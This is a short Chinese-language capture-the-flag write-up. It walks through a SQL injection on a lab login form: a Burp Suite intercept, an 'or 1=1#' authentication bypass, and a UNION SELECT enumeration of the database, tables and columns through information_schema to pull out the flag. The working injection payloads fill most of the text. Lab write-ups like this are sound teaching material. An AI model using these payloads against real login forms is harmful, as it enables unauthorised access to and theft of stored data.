![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsISPrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdsATOfd3bkFGazxCMx8VesATMfhHLlN3XnxCMwEzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5SOjNmZ4QTYwcjYwMTZ0QWZ0MjY2UTN4M2NzEmYlVTZh9CXwMzLchDMxIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjL4M3Lc9CX6MHc0RHaiojIsJye.png)
打開容器,發現一個登陸框
輸入admin 密碼随便輸入,用burp抓包,發送到Repeater子產品
首先試試萬能密碼:’or 1=1# username=admin'or 1=1#&password=123 發現登陸成功
接着檢視回顯位置:username=admin'or 1=1 union select 1,2,3#&password=123
發現有回顯
接着就爆庫爆表爆資料
爆庫:username=admin'or 1=1 union select 1,database(),3#&password=123
發現資料庫位web2
爆表名爆表admin'or 1=1 union select 1,group_concat(table_name),3(1,2,3是回顯位置,哪個位置有回顯就在哪個地方寫group...) from information_schema.tables where table_schema='查詢到的資料庫名'
成功爆出flag跟user
接着爆字段admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='要查詢的字段名'
發現flag字段
接下來就直接查找flag字段下面的資料
爆資料admin'or 1=1 union select 1,要爆的資料,3 from 爆出的字段名
成功拿到flag